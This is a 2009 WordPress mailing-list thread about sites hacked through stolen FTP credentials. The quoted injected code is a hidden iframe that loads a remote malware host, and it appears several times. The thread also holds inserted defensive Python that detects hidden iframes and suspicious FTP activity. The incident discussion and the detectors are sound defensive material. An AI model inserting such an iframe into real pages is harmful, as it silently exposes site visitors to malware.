Re: [wp-testers] Default.widgets.php Hacked? What to do?
another advice: stop using ftp, use sftp instead
block suspicious IPs

On Fri, Jul 24, 2009 at 7:39 AM, Navjot Singh navjotjsi...@gmail.com wrote:
> File permissions were normal as it would be on any Normal wordpress install i.e. 644.
>
> On Fri, Jul 24, 2009 at 02:01:14AM +0530, Navjot Singh wrote:
> How to prevent further hacking? I am currently replacing all the files
>
> And what were the file permissions?
> -- Hal
>
> Yeah, I found that funny too. Thank god users of my site didn't have to mark my site as infected with virus as the whole website didn't work!
>
> On Fri, Jul 24, 2009 at 3:20 AM, Chris Carter carter.ch...@gmail.com wrote:
> ...funny thing was that sometimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the ? tags :)
> -Chris
> 314media.com

--
With Love
Dinu
http://chromestory.com
http://offlineblog.net
___
wp-testers mailing list
wp-testers@lists.automattic.com
http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
While I know that there are viruses that can steal your FTP credentials from common software programs, are you sure that that is what is going on here?

The most commonplace method I've seen to inject this sort of thing into files is simple shared hosting with poor security practices. Once a hacker gets into one site on the server, he can run a script that simply searches for *.php or *.html and injects his code into anything it finds. Thus he's got his code on dozens or hundreds of sites instantly. Make the script run every so often, and you keep getting hacked over and over again.

Solution in this case is two fold:
1. Correct the permissions. 755 or 644 for everything. Unfortunately, sometimes this is ineffective (poor security config tends to be *really* poor).
2. Switch hosts to one that knows what they're doing.

While I don't doubt that people have gotten hacked based on stolen FTP creds, it seems more likely to me that this sort of code injection is done via bad shared hosting instead.

-Otto
Re: [wp-testers] Default.widgets.php Hacked? What to do?
I did a lot of reading on this subject to ensure that I knew the full scope of it. It's quite clear to me that the stolen FTP credentials are definitely the cause of this specific issue:

* Malicious “Income” IFrames from .CN Domains http://bit.ly/NgWFA
* Hidden CN Iframes Are Still Prevalent http://bit.ly/12uY53

That said, you are quite right that getting a virus on your local machine isn't the only problem. It is very important for WordPress users to be aware that their site can be compromised by poor security practices on or off their server.

Chris Jean
http://gaarai.com/
http://wp-roadmap.com/
http://dnsyogi.com/

Otto wrote:
> While I know that there are viruses that can steal your FTP credentials from common software programs, are you sure that that is what is going on here?
>
> The most commonplace method I've seen to inject this sort of thing into files is simple shared hosting with poor security practices. Once a hacker gets into one site on the server, he can run a script that simply searches for *.php or *.html and injects his code into anything it finds. Thus he's got his code on dozens or hundreds of sites instantly. Make the script run every so often, and you keep getting hacked over and over again.
>
> Solution in this case is two fold:
> 1. Correct the permissions. 755 or 644 for everything. Unfortunately, sometimes this is ineffective (poor security config tends to be *really* poor).
> 2. Switch hosts to one that knows what they're doing.
>
> While I don't doubt that people have gotten hacked based on stolen FTP creds, it seems more likely to me that this sort of code injection is done via bad shared hosting instead.
>
> -Otto
Re: [wp-testers] Default.widgets.php Hacked? What to do?
According to me Hostgator where I am hosted should be a good host or is it too vulnerable? Shifting is currently not feasible but I am hardening the security.

Confirmed from Hostgator that it was a FTP hack. Hostgator gave me only the IP address of the spammer. It was being changed constantly. It kept logging out and logging in and downloaded index.php files, made the change and uploaded. It logged out after changing one file. Don't know if blocking those ips would be of any help.

Regards
Navjot Singh

On Fri, Jul 24, 2009 at 6:54 PM, Otto o...@ottodestruct.com wrote:
> While I know that there are viruses that can steal your FTP credentials from common software programs, are you sure that that is what is going on here?
>
> The most commonplace method I've seen to inject this sort of thing into files is simple shared hosting with poor security practices. Once a hacker gets into one site on the server, he can run a script that simply searches for *.php or *.html and injects his code into anything it finds. Thus he's got his code on dozens or hundreds of sites instantly. Make the script run every so often, and you keep getting hacked over and over again.
>
> Solution in this case is two fold:
> 1. Correct the permissions. 755 or 644 for everything. Unfortunately, sometimes this is ineffective (poor security config tends to be *really* poor).
> 2. Switch hosts to one that knows what they're doing.
>
> While I don't doubt that people have gotten hacked based on stolen FTP creds, it seems more likely to me that this sort of code injection is done via bad shared hosting instead.
>
> -Otto
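Added example, not part of the original thread: detection logic for the FTP pattern described above, where one account's files are downloaded and re-uploaded within seconds, each time from a different address. It assumes the host provides transfer logs in the common xferlog format; the log lines, account names, thresholds and function names are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in xferlog format (documentation-range IPs, made-up accounts).
SAMPLE_XFERLOG = """\
Thu Jul 23 20:11:02 2009 1 203.0.113.5 397 /home/acct/public_html/index.php a _ o r acct ftp 0 * c
Thu Jul 23 20:11:09 2009 1 203.0.113.5 512 /home/acct/public_html/index.php a _ i r acct ftp 0 * c
Thu Jul 23 20:12:40 2009 1 198.51.100.77 2210 /home/acct/public_html/wp-admin/index.php a _ o r acct ftp 0 * c
Thu Jul 23 20:12:44 2009 1 198.51.100.77 2325 /home/acct/public_html/wp-admin/index.php a _ i r acct ftp 0 * c
Thu Jul 23 20:14:03 2009 1 192.0.2.19 880 /home/acct/public_html/blog/index.php a _ o r acct ftp 0 * c
Thu Jul 23 20:14:08 2009 1 192.0.2.19 995 /home/acct/public_html/blog/index.php a _ i r acct ftp 0 * c
Fri Jul 24 09:30:00 2009 3 192.0.2.200 48211 /home/acct/public_html/wp-content/uploads/photo.jpg b _ i r acct ftp 0 * c
Fri Jul 24 09:41:10 2009 1 192.0.2.200 1500 /home/other/public_html/style.css a _ o r other ftp 0 * c
Fri Jul 24 09:55:10 2009 1 192.0.2.200 1620 /home/other/public_html/style.css a _ i r other ftp 0 * c
"""


def parse_xferlog_line(line):
    """Parse one xferlog record; return None for lines that do not fit the format."""
    parts = line.split()
    if len(parts) < 18:
        return None
    try:
        when = datetime.strptime(" ".join(parts[:5]), "%a %b %d %H:%M:%S %Y")
    except ValueError:
        return None
    tail = parts[-9:]  # the nine fixed fields that follow the file name
    return {
        "time": when,
        "ip": parts[6],
        "path": " ".join(parts[8:-9]),  # file names may contain spaces
        "direction": tail[2],           # "o" = download, "i" = upload
        "user": tail[4],
        "complete": tail[8] == "c",
    }


def round_trips(events, window=timedelta(minutes=2)):
    """Return uploads that replace a file the same account and IP downloaded
    less than `window` earlier (fetch, modify, put back)."""
    last_download = {}
    trips = []
    for event in sorted(events, key=lambda e: e["time"]):
        if not event["complete"]:
            continue
        key = (event["user"], event["ip"], event["path"])
        if event["direction"] == "o":
            last_download[key] = event["time"]
        elif event["direction"] == "i" and key in last_download:
            if event["time"] - last_download.pop(key) <= window:
                trips.append(event)
    return trips


def suspicious_accounts(log_text, min_ips=3, window=timedelta(minutes=2)):
    """Flag accounts whose quick round trips come from at least `min_ips` addresses.
    Both thresholds are assumptions to tune against your own traffic."""
    events = [e for e in map(parse_xferlog_line, log_text.splitlines()) if e]
    by_user = defaultdict(lambda: {"ips": set(), "files": []})
    for trip in round_trips(events, window):
        by_user[trip["user"]]["ips"].add(trip["ip"])
        by_user[trip["user"]]["files"].append(trip["path"])
    return {
        user: {"ips": sorted(data["ips"]), "files": data["files"]}
        for user, data in by_user.items()
        if len(data["ips"]) >= min_ips
    }


if __name__ == "__main__":
    for user, data in suspicious_accounts(SAMPLE_XFERLOG).items():
        print(user, "modified", len(data["files"]), "files from", data["ips"])
```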
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Doesn't anyone besides me think it is a poor security practice to store FTP credentials on their PC at all? I realize it is a bit inconvenient at times to have to remember passwords, but if your FTP software is storing credentials in an unencrypted file, I think it is a HUGE security risk to let it store your FTP passwords. This also goes for your browser storing login passwords for your sites.

--Jennifer

Chris Jean wrote:
> I did a lot of reading on this subject to ensure that I knew the full scope of it. It's quite clear to me that the stolen FTP credentials are definitely the cause of this specific issue:
>
> * Malicious “Income” IFrames from .CN Domains http://bit.ly/NgWFA
> * Hidden CN Iframes Are Still Prevalent http://bit.ly/12uY53
>
> That said, you are quite right that getting a virus on your local machine isn't the only problem. It is very important for WordPress users to be aware that their site can be compromised by poor security practices on or off their server.

--
Jennifer Hodgdon * Poplar ProductivityWare
www.poplarware.com
Drupal, WordPress, and custom Web programming
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Of course it is, but there's definitely a balance between security and convenience. I just checked, and I have 33 sites (including login/pass) stored in my FTP software (all sites I work on regularly). There's no way I would remember them all unless I made them all the same (also bad). It's even worse in my browser, I have 160 save logins (although not all of those are sites I have admin on, and I don't save them for banks, etc). It's not the most secure, but for me it's right mix of security and convenience (since I have control of my system that stores those and have decent security practices on it).

Jennifer Hodgdon wrote:
> Doesn't anyone besides me think it is a poor security practice to store FTP credentials on their PC at all? I realize it is a bit inconvenient at times to have to remember passwords, but if your FTP software is storing credentials in an unencrypted file, I think it is a HUGE security risk to let it store your FTP passwords. This also goes for your browser storing login passwords for your sites.
>
> --Jennifer
Re: [wp-testers] Default.widgets.php Hacked? What to do?
http://keepass.info/

On 24.07.2009 at 17:36, Aaron D. Campbell aa...@xavisys.com wrote:
> Of course it is, but there's definitely a balance between security and convenience. I just checked, and I have 33 sites (including login/pass) stored in my FTP software (all sites I work on regularly). There's no way I would remember them all unless I made them all the same (also bad). It's even worse in my browser, I have 160 save logins (although not all of those are sites I have admin on, and I don't save them for banks, etc). It's not the most secure, but for me it's right mix of security and convenience (since I have control of my system that stores those and have decent security practices on it).
>
> Jennifer Hodgdon wrote:
> Doesn't anyone besides me think it is a poor security practice to store FTP credentials on their PC at all? I realize it is a bit inconvenient at times to have to remember passwords, but if your FTP software is storing credentials in an unencrypted file, I think it is a HUGE security risk to let it store your FTP passwords. This also goes for your browser storing login passwords for your sites.
>
> --Jennifer

--
Tom Klingenberg
lastflood GmbH
Leibnizstr. 24
55118 Mainz
Germany
Phone: +49 6131 672250
Fax: +49 6131 604232
Web: www.lastflood.com
Register: HRB 40173 at Amtsgericht Mainz; Managing Director: Tom Klingenberg
Re: [wp-testers] Default.widgets.php Hacked? What to do?
I also, as a rule, don't store passwords locally. The single exception to this is FileZilla (Windows install) as it seems to give me no choice in the matter. And since it sends FTP login data to the server in plain text anyway does it really matter as long as your firewall and anti-malware protection is fully up to date? This is for local protection only since you can't do a damn thing once you hit the Connect button in FileZilla and your login data is out there for everyone to see.

And for these folks who found their sites had been hacked, what OS were they running? If Windows, were they properly protected (firewall? Anti-malware program? Which brand?) Just thinking out loud there...

Just on the off-chance that this has affected my Windows machine and possibly any blogs I administer via FTP (all on the same host) I did a full anti-malware scan on my Windows partition and thoroughly checked the sites I administer and everything's clean.

One thing I have to wonder about though. On a Windows (desktop) system would using Windows Encrypting File System (EFS) to encrypt the FileZilla (settings) folder and its .xml files help prevent this type of thing from happening locally?

On 7/24/2009 10:09 AM, Jennifer Hodgdon wrote:
> Doesn't anyone besides me think it is a poor security practice to store FTP credentials on their PC at all? I realize it is a bit inconvenient at times to have to remember passwords, but if your FTP software is storing credentials in an unencrypted file, I think it is a HUGE security risk to let it store your FTP passwords. This also goes for your browser storing login passwords for your sites.
>
> --Jennifer
>
> Chris Jean wrote:
> I did a lot of reading on this subject to ensure that I knew the full scope of it. It's quite clear to me that the stolen FTP credentials are definitely the cause of this specific issue:
>
> * Malicious “Income” IFrames from .CN Domains http://bit.ly/NgWFA
> * Hidden CN Iframes Are Still Prevalent http://bit.ly/12uY53
>
> That said, you are quite right that getting a virus on your local machine isn't the only problem. It is very important for WordPress users to be aware that their site can be compromised by poor security practices on or off their server.
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Better still, I have switched to using SFTP logins every time. At least it provides more safety than sending passwords in plain-text.

On Sat, Jul 25, 2009 at 1:02 AM, Kirk M kmb4...@gmail.com wrote:
> I also, as a rule, don't store passwords locally. The single exception to this is FileZilla (Windows install) as it seems to give me no choice in the matter. And since it sends FTP login data to the server in plain text anyway does it really matter as long as your firewall and anti-malware protection is fully up to date? This is for local protection only since you can't do a damn thing once you hit the Connect button in FileZilla and your login data is out there for everyone to see.
>
> And for these folks who found their sites had been hacked, what OS were they running? If Windows, were they properly protected (firewall? Anti-malware program? Which brand?) Just thinking out loud there...
>
> Just on the off-chance that this has affected my Windows machine and possibly any blogs I administer via FTP (all on the same host) I did a full anti-malware scan on my Windows partition and thoroughly checked the sites I administer and everything's clean.
>
> One thing I have to wonder about though. On a Windows (desktop) system would using Windows Encrypting File System (EFS) to encrypt the FileZilla (settings) folder and its .xml files help prevent this type of thing from happening locally?
>
> On 7/24/2009 10:09 AM, Jennifer Hodgdon wrote:
> Doesn't anyone besides me think it is a poor security practice to store FTP credentials on their PC at all? I realize it is a bit inconvenient at times to have to remember passwords, but if your FTP software is storing credentials in an unencrypted file, I think it is a HUGE security risk to let it store your FTP passwords. This also goes for your browser storing login passwords for your sites.
>
> --Jennifer
>
> Chris Jean wrote:
> I did a lot of reading on this subject to ensure that I knew the full scope of it. It's quite clear to me that the stolen FTP credentials are definitely the cause of this specific issue:
>
> * Malicious “Income” IFrames from .CN Domains http://bit.ly/NgWFA
> * Hidden CN Iframes Are Still Prevalent http://bit.ly/12uY53
>
> That said, you are quite right that getting a virus on your local machine isn't the only problem. It is very important for WordPress users to be aware that their site can be compromised by poor security practices on or off their server.
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Using SFTP or SCP to administer blogs are the safest and will protect you from people sniffing your LAN/WLAN.

As for storing passwords in browsers, FTP clients, etc. I would recommend http://www.keepassx.org/ same as KeePass that was mentioned earlier but open source and cross platform. Lets you store all your passwords in an encrypted file. So you got all your passwords ready to copy-and-paste after typing one password.

Encrypted File System (EFS) will not help against viruses, as the filesystem is unencrypted while it's running. It's only good as long as the computer is off, but is very good to have if your laptop gets stolen. But everything helps.

In my case I always use highly random passwords that I copy-and-paste from KeePassX. I use Linux that still isn't as targeted as Windows (yet). And I ALWAYS administer the sites using secure channels like SFTP, SSH, SCP, or HTTPS as long as it's possible.

> Better still, I have switched to using SFTP logins every time. At least it provides more safety than sending passwords in plain-text.
>
> On Sat, Jul 25, 2009 at 1:02 AM, Kirk M kmb4...@gmail.com wrote:
> I also, as a rule, don't store passwords locally. The single exception to this is FileZilla (Windows install) as it seems to give me no choice in the matter. And since it sends FTP login data to the server in plain text anyway does it really matter as long as your firewall and anti-malware protection is fully up to date? This is for local protection only since you can't do a damn thing once you hit the Connect button in FileZilla and your login data is out there for everyone to see.
>
> And for these folks who found their sites had been hacked, what OS were they running? If Windows, were they properly protected (firewall? Anti-malware program? Which brand?) Just thinking out loud there...
>
> Just on the off-chance that this has affected my Windows machine and possibly any blogs I administer via FTP (all on the same host) I did a full anti-malware scan on my Windows partition and thoroughly checked the sites I administer and everything's clean.
>
> One thing I have to wonder about though. On a Windows (desktop) system would using Windows Encrypting File System (EFS) to encrypt the FileZilla (settings) folder and its .xml files help prevent this type of thing from happening locally?
>
> On 7/24/2009 10:09 AM, Jennifer Hodgdon wrote:
> Doesn't anyone besides me think it is a poor security practice to store FTP credentials on their PC at all? I realize it is a bit inconvenient at times to have to remember passwords, but if your FTP software is storing credentials in an unencrypted file, I think it is a HUGE security risk to let it store your FTP passwords. This also goes for your browser storing login passwords for your sites.
>
> --Jennifer
>
> Chris Jean wrote:
> I did a lot of reading on this subject to ensure that I knew the full scope of it. It's quite clear to me that the stolen FTP credentials are definitely the cause of this specific issue:
>
> * Malicious “Income” IFrames from .CN Domains http://bit.ly/NgWFA
> * Hidden CN Iframes Are Still Prevalent http://bit.ly/12uY53
>
> That said, you are quite right that getting a virus on your local machine isn't the only problem. It is very important for WordPress users to be aware that their site can be compromised by poor security practices on or off their server.
Re: [wp-testers] Default.widgets.php Hacked? What to do?
I am using Roboform instead of KeePass.

On Sat, Jul 25, 2009 at 2:34 AM, André an...@thehook.eu wrote:
> Using SFTP or SCP to administer blogs are the safest and will protect you from people sniffing your LAN/WLAN.
>
> As for storing passwords in browsers, FTP clients, etc. I would recommend http://www.keepassx.org/ same as KeePass that was mentioned earlier but open source and cross platform. Lets you store all your passwords in an encrypted file. So you got all your passwords ready to copy-and-paste after typing one password.
>
> Encrypted File System (EFS) will not help against viruses, as the filesystem is unencrypted while it's running. It's only good as long as the computer is off, but is very good to have if your laptop gets stolen. But everything helps.
>
> In my case I always use highly random passwords that I copy-and-paste from KeePassX. I use Linux that still isn't as targeted as Windows (yet). And I ALWAYS administer the sites using secure channels like SFTP, SSH, SCP, or HTTPS as long as it's possible.
>
> Better still, I have switched to using SFTP logins every time. At least it provides more safety than sending passwords in plain-text.
>
> On Sat, Jul 25, 2009 at 1:02 AM, Kirk M kmb4...@gmail.com wrote:
> I also, as a rule, don't store passwords locally. The single exception to this is FileZilla (Windows install) as it seems to give me no choice in the matter. And since it sends FTP login data to the server in plain text anyway does it really matter as long as your firewall and anti-malware protection is fully up to date? This is for local protection only since you can't do a damn thing once you hit the Connect button in FileZilla and your login data is out there for everyone to see.
>
> And for these folks who found their sites had been hacked, what OS were they running? If Windows, were they properly protected (firewall? Anti-malware program? Which brand?) Just thinking out loud there...
>
> Just on the off-chance that this has affected my Windows machine and possibly any blogs I administer via FTP (all on the same host) I did a full anti-malware scan on my Windows partition and thoroughly checked the sites I administer and everything's clean.
>
> One thing I have to wonder about though. On a Windows (desktop) system would using Windows Encrypting File System (EFS) to encrypt the FileZilla (settings) folder and its .xml files help prevent this type of thing from happening locally?
>
> On 7/24/2009 10:09 AM, Jennifer Hodgdon wrote:
> Doesn't anyone besides me think it is a poor security practice to store FTP credentials on their PC at all? I realize it is a bit inconvenient at times to have to remember passwords, but if your FTP software is storing credentials in an unencrypted file, I think it is a HUGE security risk to let it store your FTP passwords. This also goes for your browser storing login passwords for your sites.
>
> --Jennifer
>
> Chris Jean wrote:
> I did a lot of reading on this subject to ensure that I knew the full scope of it. It's quite clear to me that the stolen FTP credentials are definitely the cause of this specific issue:
>
> * Malicious “Income” IFrames from .CN Domains http://bit.ly/NgWFA
> * Hidden CN Iframes Are Still Prevalent http://bit.ly/12uY53
>
> That said, you are quite right that getting a virus on your local machine isn't the only problem. It is very important for WordPress users to be aware that their site can be compromised by poor security practices on or off their server.
[wp-testers] Default.widgets.php Hacked? What to do?
I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly :

iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe

How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked.

Regards
Navjot Singh
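Added example, not part of the original thread: a Python check a site owner could run over a copy of the WordPress tree to list files carrying a hidden iframe, group them by modification day (the post notes they all changed on one date), and report anything looser than the 644/755 permissions recommended elsewhere in the thread. It assumes the injected snippet was an ordinary `<iframe>` tag whose angle brackets the archive dropped; the sample tree, the `injected.example` host and all function names are constructed for illustration, and the 0/1-pixel check goes beyond the case quoted here.

```python
import os
import re
import stat
import tempfile
from collections import defaultdict
from datetime import datetime, timezone

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# Inline styles that hide a frame, as in the snippet quoted in the thread.
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
# Generalization beyond the thread: a 0- or 1-pixel frame is invisible too.
TINY_RE = re.compile(r"\b(?:width|height)\s*=\s*[\"']?[01](?:px)?[\"']?(?!\w)", re.IGNORECASE)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
SCAN_EXT = (".php", ".html", ".htm")
LOOSE = stat.S_IWGRP | stat.S_IWOTH  # write bits that 644 and 755 do not grant


def hidden_iframe_sources(text):
    """Return the src of every iframe tag styled or sized to be invisible."""
    sources = []
    for match in IFRAME_RE.finditer(text):
        attrs = match.group(1)
        if HIDDEN_RE.search(attrs) or TINY_RE.search(attrs):
            src = SRC_RE.search(attrs)
            sources.append(src.group(1) if src else "(no src)")
    return sources


def scan_tree(root):
    """Return one finding per file under root that contains a hidden iframe."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as handle:
                    sources = hidden_iframe_sources(handle.read())
                mtime = os.stat(path).st_mtime
            except OSError:
                continue  # unreadable file: skip it rather than abort the scan
            if sources:
                day = datetime.fromtimestamp(mtime, timezone.utc).date().isoformat()
                findings.append({"path": os.path.relpath(path, root),
                                 "sources": sources, "modified": day})
    return sorted(findings, key=lambda f: f["path"])


def group_by_day(findings):
    """Map modification day (UTC) to affected paths: the day to look up in FTP logs."""
    days = defaultdict(list)
    for finding in findings:
        days[finding["modified"]].append(finding["path"])
    return dict(days)


def writable_by_others(root):
    """List files and directories under root that are looser than 644/755."""
    loose = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path) and os.stat(path).st_mode & LOOSE:
                loose.append(os.path.relpath(path, root))
    return sorted(loose)


def build_sample_tree(root):
    """Create a small constructed WordPress-like tree (sample data, not real files)."""
    injected = ('<iframe src="http://injected.example:8080/in.cgi?id1" '
                'width=125 height=125 style="visibility: hidden"></iframe>\n')
    visible = '<iframe src="https://video.example/e/1" width="560" height="315"></iframe>\n'
    hacked = datetime(2009, 7, 23, 12, 0, tzinfo=timezone.utc).timestamp()
    older = datetime(2009, 7, 1, 12, 0, tzinfo=timezone.utc).timestamp()
    samples = [  # (relative path, content, mode, mtime)
        ("index.php", "<?php require './wp-blog-header.php'; ?>\n" + injected, 0o644, hacked),
        ("wp-includes/default-widgets.php", "<?php /* widgets */ ?>\n" + injected, 0o664, hacked),
        ("wp-content/video.html", visible, 0o644, older),
        ("wp-config.php", "<?php /* constructed, no secrets */ ?>\n", 0o644, older),
    ]
    for rel, content, mode, mtime in samples:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as handle:
            handle.write(content)
        os.chmod(path, mode)
        os.utime(path, (mtime, mtime))
    for sub in ("wp-includes", "wp-content"):
        os.chmod(os.path.join(root, sub), 0o755)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo_root:
        build_sample_tree(demo_root)
        for day, paths in group_by_day(scan_tree(demo_root)).items():
            print(day, paths)
        print("looser than 644/755:", writable_by_others(demo_root))
```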
Re: [wp-testers] Default.widgets.php Hacked? What to do?
I keep getting hacked with that code inserted into admin/default-filters

Chris Carter
President
314media.com
314-714-5448

On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote:
> I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly :
>
> iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe
>
> How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked.
>
> Regards
> Navjot Singh
Re: [wp-testers] Default.widgets.php Hacked? What to do?
yikes! Not good. Hope there's a patch soon.
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Sorry to mention..blog was on 2.8.1...didn't get time to upgrade...now upgrading.

On Fri, Jul 24, 2009 at 2:17 AM, Paleo Pat tpblogedi...@gmail.com wrote:
> yikes! Not good. Hope there's a patch soon.
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Oh Whew! My heart was racing there for a second... :D

On Thu, Jul 23, 2009 at 4:50 PM, Navjot Singh navjotjsi...@gmail.com wrote:
> Sorry to mention..blog was on 2.8.1...didn't get time to upgrade...now upgrading.
>
> On Fri, Jul 24, 2009 at 2:17 AM, Paleo Pat tpblogedi...@gmail.com wrote:
> yikes! Not good. Hope there's a patch soon.
Re: [wp-testers] Default.widgets.php Hacked? What to do?
What version of wordpress are you running?

--
From: Chris Carter carter.ch...@gmail.com
Sent: Thursday, July 23, 2009 3:43 PM
To: wp-testers@lists.automattic.com
Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com
Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?

> I keep getting hacked with that code inserted into admin/default-filters
>
> Chris Carter
> President
> 314media.com
> 314-714-5448
>
> On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote:
> I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly :
>
> iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe
>
> How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked.
>
> Regards
> Navjot Singh
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Saw this on WP.org http://wordpress.org/support/topic/281767

Looks like a grumbman virus .. scan every PC you're using to FTP ...

This happened to a WP site of mine that I accessed FTP on my sister's PC

Fucking viruses ... It apparently searches for FTP credentials, then transmits them.. change your FTP PWD.

On Thu, Jul 23, 2009 at 3:52 PM, Paleo Pat tpblogedi...@gmail.com wrote:
> Oh Whew! My heart was racing there for a second... :D
>
> On Thu, Jul 23, 2009 at 4:50 PM, Navjot Singh navjotjsi...@gmail.com wrote:
> Sorry to mention..blog was on 2.8.1...didn't get time to upgrade...now upgrading.
>
> On Fri, Jul 24, 2009 at 2:17 AM, Paleo Pat tpblogedi...@gmail.com wrote:
> yikes! Not good. Hope there's a patch soon.
Re: [wp-testers] Default.widgets.php Hacked? What to do?
2.8.1 at the time of being hacked. Just upgraded to 2.8.2

On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbar josh2...@findingjesustoday.com wrote:
> What version of wordpress are you running?
>
> --
> From: Chris Carter carter.ch...@gmail.com
> Sent: Thursday, July 23, 2009 3:43 PM
> To: wp-testers@lists.automattic.com
> Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com
> Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
>
> I keep getting hacked with that code inserted into admin/default-filters
>
> Chris Carter
> President
> 314media.com
> 314-714-5448
>
> On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote:
> I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly :
>
> iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe
>
> How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked.
>
> Regards
> Navjot Singh
Re: [wp-testers] Default.widgets.php Hacked? What to do?
I had to restore the entire blog from backup.

When I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages (including pages after login).

When I contacted Dreamhost support, they said it was an ftp hack.

So, I would think it's not a wordpress issue.

On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh navjotjsi...@gmail.com wrote:
> 2.8.1 at the time of being hacked. Just upgraded to 2.8.2
>
> On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbar josh2...@findingjesustoday.com wrote:
> What version of wordpress are you running?
>
> --
> From: Chris Carter carter.ch...@gmail.com
> Sent: Thursday, July 23, 2009 3:43 PM
> To: wp-testers@lists.automattic.com
> Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com
> Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
>
> I keep getting hacked with that code inserted into admin/default-filters
>
> Chris Carter
> President
> 314media.com
> 314-714-5448
>
> On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote:
> I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly :
>
> iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe
>
> How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked.
>
> Regards
> Navjot Singh

--
With Love
Dinu
http://chromestory.com
http://offlineblog.net
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Yeah..my Wordpress mu install also got hacked. Just confirmed.
On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote:
I had to restore from backup the entire blog. When I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages (including pages after login). When I contacted Dreamhost support, they said it was an ftp hack. So, I would think it's not a wordpress issue.
On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh navjotjsi...@gmail.com wrote:
2.8.1 at the time of being hacked. Just upgraded to 2.8.2
On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbar josh2...@findingjesustoday.com wrote:
What version of wordpress are you running?
--
From: Chris Carter carter.ch...@gmail.com
Sent: Thursday, July 23, 2009 3:43 PM
To: wp-testers@lists.automattic.com
Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com
Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
I keep getting hacked with that code inserted into admin/default-filters
Chris Carter President 314media.com 314-714-5448
On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote:
I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with the following code inserted randomly:
iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe
How to prevent further hacking? I am currently replacing all the files affected since all of them were affected at a certain date. I am on a shared hosting and only one blog got attacked.
Regards Navjot Singh
-- With Love Dinu http://chromestory.com http://offlineblog.net
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Change your pwds and scan away.. I used cpanel file manager for a while to make sure they stopped attacking .. looking at logs, it hits and is tagged with googlebot, but the IPs are strange.
Anyway, this virus looks for files with: index*.* default*.* main*.* home*.* (I built a static php includes site, and only files named like the above were affected)
Also might want to check your CGI-BIN for files that look suspicious.
